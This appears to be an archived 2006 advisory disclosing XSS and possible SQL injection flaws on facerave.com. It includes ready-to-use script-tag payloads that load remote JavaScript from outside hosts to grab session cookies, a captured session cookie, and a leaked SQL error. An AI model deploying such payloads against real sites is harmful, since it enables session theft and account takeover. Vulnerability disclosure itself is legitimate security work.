facerave.txt

facerave.txt: Posted Jun 21, 2006; Authored by Luny; facerave.com suffers from cross site scripting and possible SQL injection flaws.; tags | exploit, xss, sql injection; SHA-256 | a88613bfc0514f3f03b22ef09213783f01feadfc1d92cec56e8e9082ab1edb99; Download | Favorite | View

facerave.txt

Facerave.com

Homepage:
http://www.facerave.com

Effected files:

* Profile input boxes

- Self Description box

* Posting a blog entry

* Sending a message

index.php
------------------------------------------------------

XSS vuln with cookie disclosure via posting a comment:

No filter evasion needed. for PoC in yourself description box put:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/facerave1.jpg
http://www.youfucktard.com/xsp/facerave2.jpg

-----------------------------------------------------

XSS vuln with cookie disclosure when posting a blog entry:

Same as above:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/facerave3.jpg
http://www.youfucktard.com/xsp/facerave4.jpg

Our cookie:

This is remote text via xss.js located at youfucktard.com lang=en; PHPSESSID=dfb7edf9c3d2350d04cd5ed60585b2f1;voted=YToxMTp7aTowO047aToxO3M6NDoiMzkzNiI7aToyO3M6NDoiNzQ1NCI7aTozO3M6NjoiMTE4OTY1IjtpOjQ7czo2OiIxMTg5NjYiO2k6NTtzOjY6IjExODk2NyI7aTo2O3M6NjoiMTE4OTY4IjtpOjc7czo2OiIxMTg5NjkiO2k6ODtzOjY6IjExODk3MCI7aTo5O3M6NjoiMTE4OTcxIjtpOjEwO3M6NjoiMTE4OTcyIjt9; last_pr=7454


Breaking down the cookie:

PHPSESSID= (Our php session Id on the site)

voted= Base64 encoded. When we decode it we get:

a:11:{i:0;N;i:1;s:4:"3936";i:2;s:4:"7454";i:3;s:6:"118965";i:4;s:6


----------------------------------------------------

XSS Vuln and possible SQL injection on deleting blog id:

http://www.facerave.com/index.php?req=blog&act=del&id=1087">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>

Query error msg:
You have an error in your SQL syntax near '\' AND b_user=7454' at line 1
Failed query: DELETE FROM rate_blogs WHERE b_id=1087\' AND b_user=7454

Screenshot:
http://www.youfucktard.com/xsp/facerave5.jpg

-----------------------------------------------------

Sending a message xss vuln:

Same as above, no filter evasion. in your msg title or subject put:
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshot:
http://www.youfucktard.com/xsp/facerave6.jpg
------------------------------------------------------

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

facerave.txt

facerave.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

facerave.txt

Share This

facerave.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems